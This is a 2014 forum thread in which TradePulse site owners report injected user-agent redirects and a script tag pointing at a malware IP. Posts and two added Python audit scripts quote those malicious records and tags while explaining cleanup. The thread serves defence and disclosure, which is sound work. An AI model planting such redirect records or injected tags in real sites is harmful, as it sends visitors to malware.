Script Pulse

Trade Pulse => Trade Pulse Support => Topic started by: Shoplifter on April 25, 2014, 08:58:23 PM

Title: A new hack? User agent hack?
Post by: Shoplifter on April 25, 2014, 08:58:23 PM
Nearly every one of my TP sites now seems to have files in /tp/data/settings/ modified to add a virus site.

For example:

/tp/data/settings/out_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/outconf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/in_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}
/tp/data/settings/in_conf.php:
a:1:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}}
/tp/data/settings/out_redir.set.adm:
a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";s:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}

I gather that this may redirect that particular user agent to the attack site. In fact, the user agent redirect setting in both the in and out areas of the TP control panel is selected.
It seems that the attacker has added a record to the data files in /tp/data/settings to do this. These files are all chmod 777 even if the TP install is locked. Classy stuff; whoever did this knows the software well.
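The records quoted above are PHP serialize() output, so an administrator can check a settings directory without the control panel. The following is an added example, not TradePulse code: it parses that format, flags any "uagent" redirect whose target host is not on an allowlist, and reports files that are world-writable (the 777 mode noted above). The sample records and file names are constructed from what the post shows; the clean-file layout is an assumption.

```python
"""Audit a TradePulse-style /tp/data/settings directory (added example)."""
import os
import stat
import tempfile
from urllib.parse import urlparse

# Constructed samples: the first is the .adm record quoted in the post, the
# second is what an untouched redirect table is assumed to look like.
SAMPLE_INFECTED = (
    'a:2:{s:6:"uagent";a:1:{s:6:"MSIE 8";'
    's:38:"http://37.9.53.204/mobile.php?niche=cj";}s:10:"url_mobile";s:0:"";}'
)
SAMPLE_CLEAN = 'a:1:{s:6:"uagent";a:0:{}}'


def php_unserialize(data):
    """Parse the PHP serialize() subset used here: s:, i:, b:, N; and a:.
    PHP string lengths are byte counts; this assumes ASCII content."""
    pos = 0

    def parse():
        nonlocal pos
        kind = data[pos]
        if kind == 'N':                      # N;
            pos += 2
            return None
        if kind in 'ib':                     # i:123;  b:1;
            end = data.index(';', pos)
            raw = data[pos + 2:end]
            pos = end + 1
            return int(raw) if kind == 'i' else raw == '1'
        if kind == 's':                      # s:<len>:"<bytes>";
            colon = data.index(':', pos + 2)
            length = int(data[pos + 2:colon])
            start = colon + 2
            value = data[start:start + length]
            pos = start + length + 2
            return value
        if kind == 'a':                      # a:<count>:{<key><value>...}
            colon = data.index(':', pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            result = {}
            for _ in range(count):
                key = parse()
                result[key] = parse()
            pos += 1                         # closing '}'
            return result
        raise ValueError('unsupported serialized type %r at offset %d' % (kind, pos))

    return parse()


def find_uagent_redirects(settings, allowed_hosts=()):
    """Return (user_agent, url) pairs whose redirect target is off-site."""
    findings = []
    for ua, url in (settings.get('uagent') or {}).items():
        host = urlparse(url).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append((ua, url))
    return findings


def world_writable(path):
    """True when the file's mode grants write to 'other' (e.g. 777 or 666)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def audit_settings_dir(directory, allowed_hosts=()):
    """Return [(file name, [issue, ...])] for every file with a problem."""
    report = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        issues = []
        if world_writable(path):
            issues.append('world-writable')
        with open(path, encoding='latin-1') as fh:
            text = fh.read().strip()
        if text:
            try:
                redirects = find_uagent_redirects(php_unserialize(text), allowed_hosts)
            except (ValueError, IndexError):
                redirects = []
                issues.append('not parseable as PHP serialized data')
            for ua, url in redirects:
                issues.append('user-agent redirect %r -> %s' % (ua, url))
        if issues:
            report.append((name, issues))
    return report


def build_demo_dir():
    """Write the constructed samples to a temp dir mimicking /tp/data/settings,
    leaving one file world-writable as in the report above."""
    directory = tempfile.mkdtemp(prefix='tp_settings_')
    for name, text, mode in (('in_redir.set.adm', SAMPLE_INFECTED, 0o777),
                             ('out_redir.set', SAMPLE_CLEAN, 0o644)):
        path = os.path.join(directory, name)
        with open(path, 'w') as fh:
            fh.write(text)
        os.chmod(path, mode)
    return directory


if __name__ == '__main__':
    for name, issues in audit_settings_dir(build_demo_dir(), allowed_hosts=('example.com',)):
        print(name, '->', '; '.join(issues))
```

Run it against the real directory by passing its path to audit_settings_dir and listing the site's own host names in allowed_hosts; any file it prints has either a foreign redirect or permissions that let any local process rewrite it.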
Title: Re: A new hack? User agent hack?
Post by: ip0li on April 27, 2014, 06:30:20 AM
Sent to kildoozer. I checked mine and 10 other clients' sites and they look clean (regarding your TP forum topic), so it must be an isolated thing. If files are locked it's impossible to change them with a script, only with FTP/SSH access!
Title: Re: A new hack? User agent hack?
Post by: Kildoozer on April 27, 2014, 10:04:41 AM
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.
Title: Re: A new hack? User agent hack?
Post by: Shoplifter on April 27, 2014, 11:12:56 AM
Hi Shoplifter,
please send me your TP info to kildoozer@scriptpulse.com, I'll check this asap.

Sending now.

I cleaned it out by going into the admin and disabling the redirects. So far so good. I double-checked the lock and ran lock.php again, but the files in /data/settings are all 777.

Title: Re: A new hack? User agent hack?
Post by: skyblue on May 18, 2014, 11:27:14 AM
I'm getting the same. Now Google has put a warning next to my site in the search engine, and Webmaster Tools says it has malware, mainly this: <script type="text/javascript" src="http://37.9.53.204/mobile.php?niche=js">

Title: Re: A new hack? User agent hack?
Post by: Nosik on May 18, 2014, 01:22:25 PM
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?
Title: Re: A new hack? User agent hack?
Post by: skyblue on May 18, 2014, 02:06:45 PM
How do you clean it out?
Title: Re: A new hack? User agent hack?
Post by: Nosik on May 18, 2014, 09:25:42 PM
How do you clean it out?
Just deleted "Redirect by User Agent" in Settings -> IN and Settings -> Out. Then deleted the iframe code from Tools -> Toplists -> top.html. Then I went to Google Webmaster Tools and sent the request to rescan my sites to delete the virus warning (and they have approved it).

But we need to close this backdoor.
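The second cleanup step above is removing injected markup from the toplist template. As an added example (not TradePulse code), this scans an HTML template for script and iframe elements whose src points at a host outside an allowlist, reports them with their line numbers, and produces a cleaned copy. The template text is constructed for the example; the script tag matches the one reported in this thread, and the iframe is an assumed variant on the same host.

```python
"""Find and strip off-site <script>/<iframe> includes in a template (added example)."""
import re
from urllib.parse import urlparse

# Whole element (opening tag, optional body, closing tag) or a self-closed tag.
ELEMENT_RE = re.compile(r'<(script|iframe)\b([^>]*?)(?:/>|>.*?</\1\s*>)',
                        re.IGNORECASE | re.DOTALL)
# src attribute inside the opening tag only, quoted or bare.
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)

# Constructed sample of a toplist top.html after injection.
SAMPLE_TOP_HTML = """<html><head>
<script type="text/javascript" src="/tp/js/toplist.js"></script>
</head><body>
<div class="top"><!-- toplist rows here --></div>
<script type="text/javascript" src="http://37.9.53.204/mobile.php?niche=js"></script>
<iframe src="http://37.9.53.204/mobile.php?niche=cj" width="1" height="1"></iframe>
</body></html>
"""


def _foreign_src(match, allowed_hosts):
    """Return the element's src when it loads from a host not in allowed_hosts,
    else None (relative paths and allowed hosts are treated as local)."""
    src_match = SRC_RE.search(match.group(2))
    if not src_match:
        return None                      # inline script, no remote include
    src = src_match.group(1)
    host = urlparse(src).hostname        # handles http://, https:// and //host
    if host and host.lower() not in allowed_hosts:
        return src
    return None


def find_foreign_embeds(html, allowed_hosts=()):
    """Return (line number, tag, src) for every off-site script/iframe."""
    found = []
    for match in ELEMENT_RE.finditer(html):
        src = _foreign_src(match, allowed_hosts)
        if src is not None:
            line = html.count('\n', 0, match.start()) + 1
            found.append((line, match.group(1).lower(), src))
    return found


def strip_foreign_embeds(html, allowed_hosts=()):
    """Return the template with every off-site script/iframe element removed."""
    def keep_or_drop(match):
        return '' if _foreign_src(match, allowed_hosts) is not None else match.group(0)
    return ELEMENT_RE.sub(keep_or_drop, html)


if __name__ == '__main__':
    for line, tag, src in find_foreign_embeds(SAMPLE_TOP_HTML):
        print('line %d: <%s> loads %s' % (line, tag, src))
    print(strip_foreign_embeds(SAMPLE_TOP_HTML))
```

Point find_foreign_embeds at the real top.html (and any other template the toplist writes) with the site's own domains in allowed_hosts; an inline script with no src is not reported, so review those by hand, and keep a backup before writing the stripped output back.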
Title: Re: A new hack? User agent hack?
Post by: skyblue on May 19, 2014, 08:48:40 AM
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Title: Re: A new hack? User agent hack?
Post by: Nosik on May 19, 2014, 01:05:57 PM
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
Title: Re: A new hack? User agent hack?
Post by: skyblue on May 20, 2014, 08:26:30 AM
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".

Thing is it has always been unchecked...
Title: Re: A new hack? User agent hack?
Post by: skyblue on May 20, 2014, 09:02:02 AM
My traffic has halved and do not know where to look or how to get rid of it! Thanks for the help so far guys :)

Update: Until TP gets this sorted I have taken the Trade Pulse include out of my site for now, until it's safe to put back. Have resubmitted the site to Google... waiting to see if they approve it!
Title: Re: A new hack? User agent hack?
Post by: skyblue on May 20, 2014, 12:50:22 PM
OK, found the code in my toplist template, just deleted it, hoping it's clean for now!
Title: Re: A new hack? User agent hack?
Post by: Bryan on May 22, 2014, 02:21:24 PM
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
I unchecked it and hit submit. It went through the Google warning, I clicked "ignore" and went ahead, and the "Redirect by User Agent" came back checked again. Any idea?
Title: Re: A new hack? User agent hack?
Post by: Shoplifter on May 23, 2014, 12:31:37 AM
I got the same problem on my sites. Cleaned. But how to fix this vulnerability?

That is a good question. I feel the attacker is getting in through some sort of back door, I can't believe he managed to get the admin passes for my sites as well as for other TP users.
Title: Re: A new hack? User agent hack?
Post by: Nosik on May 25, 2014, 02:37:51 AM
Cheers but how do I delete in settings? The "Redirect " box is unchecked by the way...can't see how you delete it?
Cheers
Uncheck is enough. You can also press "Specify" and empty fields with this record and then press "Submit".
I unchecked it, and hit submit, it went through google warning, i clicked "ignore" and went ahead, the "Redirect by User Agent" came checked again. any idea?
Try to open the page in a browser without Google "control" (e.g. IE).
Title: Re: A new hack? User agent hack?
Post by: ip0li on October 14, 2014, 03:22:31 AM
Simply clean your sites, and make sure the TP install is locked as described on the forum. This is not a TP hack; check your other scripts for backdoors and make sure someone didn't get your FTP user/pass!!!